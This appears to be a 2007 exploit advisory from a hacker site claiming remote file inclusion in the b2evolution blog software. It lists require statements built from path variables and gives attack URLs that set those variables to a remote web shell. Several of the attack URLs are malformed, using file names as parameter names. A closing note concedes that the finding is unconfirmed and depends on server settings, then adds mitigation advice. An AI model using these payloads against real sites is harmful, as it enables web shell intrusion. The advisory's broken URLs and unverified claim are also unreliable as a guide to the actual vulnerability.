####################################################
# b2evolution Remote File Inclusion #
####################################################
Affected Software .: b2evolution
# Download..: http://b2evolution.net/
# Risk ..............: high
# Date .........: 25/4/2007
# Found by ..........: s433d_only_linux
# Contact ...........: s433d_only_linux@xxxxxxxx
# Web .............: Www.hackerz.ir
# special thanx ........... Ali Jasbi my best friend#
####################################################
####################################################

Affected File:

b2evolution\blogs/a_noskin.php
    require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/a_stub.php
    require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/admin.php
    require_once $inc_path.'_main.inc.php';
b2evolution\blogs/admin.php
    require $view_path.'errors/_access_denied.inc.php';
b2evolution\blogs/admin.php
    require_once $inc_path.'_async.inc.php';
b2evolution\blogs/admin.php
    require $control_path.$ctrl_mappings[$ctrl];
b2evolution\blogs/contact.php
    require_once $inc_path.'_main.inc.php';
b2evolution\blogs/contact.php
    require $skins_path.'_msgform.php';
b2evolution\blogs/default.php
    require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php
    require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php
    require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php
    require_once $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php
    require $skins_path.'_bloglist.php';
b2evolution\blogs/multiblogs.php
    require $skins_path.'_feedback.php';

######################################################

b2evolution\blogs/a_noskin.php?require=shell?
b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=
b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=shell

Note: every statement listed above builds its include path from a variable ($inc_path, $view_path, $control_path, $skins_path). Such a require is only a file-inclusion issue if that variable can be set from the request at the moment the statement runs, which requires register_globals to be on and the script not to have assigned the variable itself beforehand (for example from its configuration file). Including a remote file additionally requires allow_url_fopen (and, from PHP 5.2.0, allow_url_include) to be enabled. The listing does not show where these variables are assigned, so verify that in the affected version before treating the report as confirmed.

Mitigation: assign every path variable unconditionally before the first include, keep register_globals and allow_url_include off, and review web server logs for requests to these scripts that pass any of the path variable names as a query parameter.